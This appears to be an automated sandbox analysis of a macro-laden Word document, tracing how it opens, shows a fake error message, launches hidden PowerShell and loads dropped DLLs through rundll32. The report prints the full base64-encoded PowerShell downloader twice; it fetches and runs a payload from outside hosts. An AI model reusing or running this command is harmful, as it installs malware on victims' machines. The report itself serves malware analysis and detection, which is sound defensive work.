                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                      Very long command line found
                      Source: unknownProcess created: Commandline size = 5709
                      Source: unknownProcess created: Commandline size = 5613
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5613
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Shuwftk\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00327998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00326D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00339586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00333FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00331BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00329FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB41F, 9_2_001FEE78, 9_2_001F2C63, 9_2_001F568E, 9_2_00203895, 9_2_001FC0C6, 9_2_002002C3, 9_2_002042DA, 9_2_001F8736, 9_2_00204B41, 9_2_001F7B63, 9_2_002063C1, 9_2_001F9A37, 9_2_0020340A, 9_2_001F4A35, 9_2_001F2A30, 9_2_00207A0F, 9_2_00205A61, 9_2_001FE05A, 9_2_001FEA4C, 9_2_001FF444, 9_2_0020687F, 9_2_0020A0AF, 9_2_001F1280, 9_2_001F48BD, 9_2_001F80BA, 9_2_001F60B9, 9_2_001F62A3, 9_2_0020889D, 9_2_002012E2, 9_2_001F96CD, 9_2_002026F5, 9_2_001F1CFA, 9_2_002020C5, 9_2_001F88E5, 9_2_00208ADC, 9_2_001FB112, 9_2_00200D33, 9_2_001F153C, 9_2_00207D03, 9_2_001FBB3A, 9_2_001FF536, 9_2_00200F0C, 9_2_00202B16, 9_2_0020511B, 9_2_00208D1C, 9_2_00205D1D, 9_2_00207F1F, 9_2_001FB75F, 9_2_00200B68, 9_2_001F6754, 9_2_00201773, 9_2_00209B45, 9_2_001F5B79, 9_2_001F8F78, 9_2_001FE377, 9_2_00202349, 9_2_00208F49, 9_2_001FC769, 9_2_001F6D9F, 9_2_001F839D, 9_2_001F7998, 9_2_002073AC, 9_2_001FF98C, 9_2_002061B8, 9_2_00206DB9, 9_2_00209586, 9_2_0020878F, 9_2_001F17AC, 9_2_001F69A0, 9_2_002031E2, 9_2_001F9FDC, 9_2_00203FE7, 9_2_002067E9, 9_2_002071EF, 9_2_001FD7EB, 9_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FB41F, 10_2_001FEE78, 10_2_001F2C63, 10_2_001F568E, 10_2_00203895, 10_2_001FC0C6, 10_2_002002C3, 10_2_002042DA, 10_2_001F8736, 10_2_00204B41, 10_2_001F7B63, 10_2_002063C1, 10_2_001F9A37, 10_2_0020340A, 10_2_001F4A35, 10_2_001F2A30, 10_2_00207A0F, 10_2_00205A61, 10_2_001FE05A, 10_2_001FEA4C, 10_2_001FF444, 10_2_0020687F, 10_2_0020A0AF, 10_2_001F1280, 10_2_001F48BD, 10_2_001F80BA, 10_2_001F60B9, 10_2_001F62A3, 10_2_0020889D, 10_2_002012E2, 10_2_001F96CD, 10_2_002026F5, 10_2_001F1CFA, 10_2_002020C5, 10_2_001F88E5, 10_2_00208ADC, 10_2_001FB112, 10_2_00200D33, 10_2_001F153C, 10_2_00207D03, 10_2_001FBB3A, 10_2_001FF536, 10_2_00200F0C, 10_2_00202B16, 10_2_0020511B, 10_2_00208D1C, 10_2_00205D1D, 10_2_00207F1F, 10_2_001FB75F, 10_2_00200B68, 10_2_001F6754, 10_2_00201773, 10_2_00209B45, 10_2_001F5B79, 10_2_001F8F78, 10_2_001FE377, 10_2_00202349, 10_2_00208F49, 10_2_001FC769, 10_2_001F6D9F, 10_2_001F839D, 10_2_001F7998, 10_2_002073AC, 10_2_001FF98C, 10_2_002061B8, 10_2_00206DB9, 10_2_00209586, 10_2_0020878F, 10_2_001F17AC, 10_2_001F69A0, 10_2_002031E2, 10_2_001F9FDC, 10_2_00203FE7, 10_2_002067E9, 10_2_002071EF, 10_2_001FD7EB, 10_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EB41F, 11_2_002E2C63, 11_2_002EEE78, 11_2_002E568E, 11_2_002F3895, 11_2_002EC0C6, 11_2_002F02C3, 11_2_002F42DA, 11_2_002E8736, 11_2_002E7B63, 11_2_002F4B41, 11_2_002F63C1, 11_2_002E9A37, 11_2_002E4A35, 11_2_002E2A30, 11_2_002F7A0F, 11_2_002F340A, 11_2_002F5A61, 11_2_002F687F, 11_2_002EEA4C, 11_2_002EF444, 11_2_002EE05A, 11_2_002FA0AF, 11_2_002E62A3, 11_2_002E48BD, 11_2_002E80BA, 11_2_002E60B9, 11_2_002E1280, 11_2_002F889D, 11_2_002E88E5, 11_2_002F12E2, 11_2_002E1CFA, 11_2_002F26F5, 11_2_002E96CD, 11_2_002F20C5, 11_2_002F8ADC, 11_2_002E153C, 11_2_002EBB3A, 11_2_002EF536, 11_2_002F0D33, 11_2_002F0F0C, 11_2_002F7D03, 11_2_002F7F1F, 11_2_002F5D1D, 11_2_002F8D1C, 11_2_002F511B, 11_2_002F2B16, 11_2_002EB112, 11_2_002EC769, 11_2_002F0B68, 11_2_002E8F78, 11_2_002E5B79, 11_2_002EE377, 11_2_002F1773, 11_2_002F2349, 11_2_002F8F49, 11_2_002F9B45, 11_2_002EB75F, 11_2_002E6754, 11_2_002E17AC, 11_2_002F73AC, 11_2_002E69A0, 11_2_002F6DB9, 11_2_002F61B8, 11_2_002F878F, 11_2_002EF98C, 11_2_002F9586, 11_2_002E6D9F, 11_2_002E839D, 11_2_002E7998, 11_2_002F71EF, 11_2_002ED7EB, 11_2_002F67E9, 11_2_002F3FE7, 11_2_002F31E2, 11_2_002F1BDF, 11_2_002E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B41F, 12_2_00212C63, 12_2_0021EE78, 12_2_0021568E, 12_2_00223895, 12_2_002202C3, 12_2_0021C0C6, 12_2_002242DA, 12_2_00218736, 12_2_00217B63, 12_2_00224B41, 12_2_002263C1, 12_2_00212A30, 12_2_00214A35, 12_2_00219A37, 12_2_0022340A, 12_2_00227A0F, 12_2_00225A61, 12_2_0022687F, 12_2_0021F444, 12_2_0021EA4C, 12_2_0021E05A, 12_2_002162A3, 12_2_0022A0AF, 12_2_002160B9, 12_2_002180BA, 12_2_002148BD, 12_2_00211280, 12_2_0022889D, 12_2_002212E2, 12_2_002188E5, 12_2_002226F5, 12_2_00211CFA, 12_2_002220C5, 12_2_002196CD, 12_2_00228ADC, 12_2_00220D33, 12_2_0021F536, 12_2_0021BB3A, 12_2_0021153C, 12_2_00227D03, 12_2_00220F0C, 12_2_0021B112, 12_2_00222B16, 12_2_0022511B, 12_2_00227F1F, 12_2_00228D1C, 12_2_00225D1D, 12_2_0021C769, 12_2_00220B68, 12_2_00221773, 12_2_0021E377, 12_2_00215B79, 12_2_00218F78, 12_2_00229B45, 12_2_00222349, 12_2_00228F49, 12_2_00216754, 12_2_0021B75F, 12_2_002169A0, 12_2_002117AC, 12_2_002273AC, 12_2_002261B8, 12_2_00226DB9, 12_2_00229586, 12_2_0022878F, 12_2_0021F98C, 12_2_00217998, 12_2_0021839D, 12_2_00216D9F, 12_2_002231E2, 12_2_00223FE7, 12_2_0021D7EB, 12_2_002267E9, 12_2_002271EF, 12_2_00221BDF, 12_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FB41F, 13_2_00205A61, 13_2_001F2C63, 13_2_001F60B9, 13_2_002002C3, 13_2_001F1CFA, 13_2_001F153C, 13_2_00207D03, 13_2_001F8736, 13_2_00202B16, 13_2_00208D1C, 13_2_00204B41, 13_2_001F5B79, 13_2_001FE377, 13_2_00202349, 13_2_001FC769, 13_2_002031E2, 13_2_001F9FDC, 13_2_001F9A37, 13_2_0020340A, 13_2_001F4A35, 13_2_001F2A30, 13_2_00207A0F, 13_2_001FE05A, 13_2_001FEA4C, 13_2_001FF444, 13_2_0020687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00203895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002012E2
                      Source: MAIL-0573188.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open
                      Source: MAIL-0573188.doc | OLE indicator, VBA macros: true
                      Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@22/8@6/6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_001F1C88 CreateToolhelp32Snapshot,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$IL-0573188.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmp
                      Source: MAIL-0573188.doc | OLE indicator, Word Document stream: true
                      Source: MAIL-0573188.doc | OLE document summary: title field not present or empty
                      Source: MAIL-0573188.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe | Console Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!.....
                      Source: C:\Windows\System32\msg.exe | Console Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................................................`I.........v.....................K......(.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j....................................}..v....xg......0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#...............z..j....................................}..v............0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: MAIL-0573188.doc | Virustotal: Detection: 66%
                      Source: MAIL-0573188.doc | Metadefender: Detection: 47%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
